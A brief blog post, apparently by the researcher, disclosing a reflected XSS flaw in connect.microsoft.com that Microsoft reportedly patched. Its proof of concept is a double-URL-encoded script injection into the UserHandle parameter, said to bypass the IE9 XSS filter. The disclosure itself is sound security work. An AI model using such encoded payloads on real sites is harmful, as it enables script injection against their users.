Sow Ching Shiong, an independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in connect.microsoft.com, which can be exploited by an attacker to conduct XSS attacks.
Proof of concept
Tested in IE9 with XSS filter enabled
============================
http://connect.microsoft.com/sqlserver/searchresults.aspx?UserHandle=%2522%253E%2527%253E%253Cscript%2520%253Ealert%2528/XSS by Sow Ching Shiong/%2529%253B%253C%252Fscript%2520%253E
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh41fsjjThxv-6cxfv3POp-R36rBzWgAGCJUUCeODNOLR1whV8_jGTE5BKN6ePfu7oJwtKi5Ax_rP5BLV3rqPeWZPxjNmhVTDVJJl3eb9E0JnAyQSB6w7XjfApv00O4D30g27e6LA_WFde6/s400/PoC+(IE9+with+XSS+filter+enabled).png)
This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.
Microsoft White Hat
http://technet.microsoft.com/en-us/security/cc308575
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.